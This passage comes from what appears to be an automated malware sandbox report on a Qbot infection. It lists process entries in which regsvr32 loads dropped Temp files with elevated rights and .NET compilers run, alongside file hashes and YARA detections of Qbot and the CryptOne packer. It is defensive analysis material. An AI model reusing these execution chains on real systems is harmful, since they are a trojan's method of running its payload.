                                                                                                                                                                    Target ID:32
                                                                                                                                                                    Start time:19:22:14
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP"
                                                                                                                                                                    Imagebase:0x1090000
                                                                                                                                                                    File size:43176 bytes
                                                                                                                                                                    MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:38
                                                                                                                                                                    Start time:19:22:39
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
                                                                                                                                                                    Imagebase:0x12f0000
                                                                                                                                                                    File size:20992 bytes
                                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000026.00000002.580482048.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000026.00000002.580575177.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000026.00000002.580362082.00000000012B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:39
                                                                                                                                                                    Start time:19:22:40
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
                                                                                                                                                                    Imagebase:0x12f0000
                                                                                                                                                                    File size:20992 bytes
                                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000027.00000002.580442594.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000027.00000002.580343714.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000027.00000002.580400049.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:40
                                                                                                                                                                    Start time:19:22:41
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
                                                                                                                                                                    Imagebase:0x12f0000
                                                                                                                                                                    File size:20992 bytes
                                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000028.00000002.582335427.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000028.00000002.582578490.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000028.00000002.582736314.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:41
                                                                                                                                                                    Start time:19:22:56
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.cmdline
                                                                                                                                                                    Imagebase:0xb40000
                                                                                                                                                                    File size:2170976 bytes
                                                                                                                                                                    MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:43
                                                                                                                                                                    Start time:19:23:13
                                                                                                                                                                    Start date:07/06/2022
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP"
                                                                                                                                                                    Imagebase:0x1090000
                                                                                                                                                                    File size:43176 bytes
                                                                                                                                                                    MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                    Disassembly

                                                                                                                                                                    No disassembly